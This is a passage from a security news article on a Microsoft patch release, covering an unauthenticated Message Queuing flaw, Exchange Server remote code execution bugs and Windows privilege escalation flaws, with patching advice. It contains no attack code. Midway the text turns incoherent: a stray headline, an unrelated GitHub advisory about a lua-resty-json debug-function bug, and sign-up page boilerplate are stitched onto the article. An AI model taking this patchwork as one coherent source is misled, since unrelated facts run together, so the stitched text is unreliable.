The fact that the attacker does not need to be authenticated makes this a particularly dangerous issue. As a temporary workaround, administrators can check if Message Queuing service is running on TCP port 1801 and disable it if not needed. Mitigations should not be considered substitutes for patching, as attackers can figure out ways to bypass the workaround and still exploit the vulnerability.

The other two critical vulnerabilities to prioritize are the remote code execution flaw in .NET, .NET Framework, and Visual Studio (CVE-2023-24897), and the denial-of-service vulnerability in Windows Hyper-V (CVE-2023-32013).

**Prioritize the "More Likely" to Be Exploited Ones, Too**

There are several vulnerabilities researchers recommend prioritizing as Microsoft considers them "more likely" to be exploited. The remote code execution vulnerability in Microsoft Exchange Server (CVE-2023-28310) would allow an authenticated attacker on the same intranet as the Exchange Server to launch to a PowerShell remote session to arbitrarily execute code.

Another remote code execution vulnerability in Exchange (CVE-2023-32031) could allow authenticated attackers on the Exchange server to execute malicious code with SYSTEM privileges. This vulnerability is a bypass of two previously fixed vulnerabilities (CVE-2022-41082 was a zero-day flaw disclosed last September and patched in November, and CVE-2023-21529 patched in Feburary). While successfully exploiting this flaw can gain SYSTEM privileges, this is not a critical-severity flaw because the attacker needs to already have an account on the Exchange server. CVE-2022-41082 is one of two so-called "ProxyNotShell" flaws in Exchange Server and has been used in ransomware attacks in the past.

Organizations need to prioritize fixing both Exchange vulnerabilities because attackers can chain these flaws as part of a larger campaign where they steal credentials or gain elevated privileges on the network.

Two other elevation of privilege vulnerabilities — one in the Windows graphics device interface (GDI) and the other in the Windows Win32k kernel driver — lets attackers gain SYSTEM privileges.

Microsoft Fixes 69 Bugs, but None Are Zero-Days

A debug function in the lua-resty-json package, up to commit id 3ef9492bd3a44d9e51301d6adc3cd1789c8f534a (merged in PR #14) contained an out of bounds access bug that could have allowed an attacker to launch a DoS if the function was used to parse untrusted input data. It is important to note that because this debug function was only used in tests and demos, it was not exploitable in a normal environment.


**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Tag

#js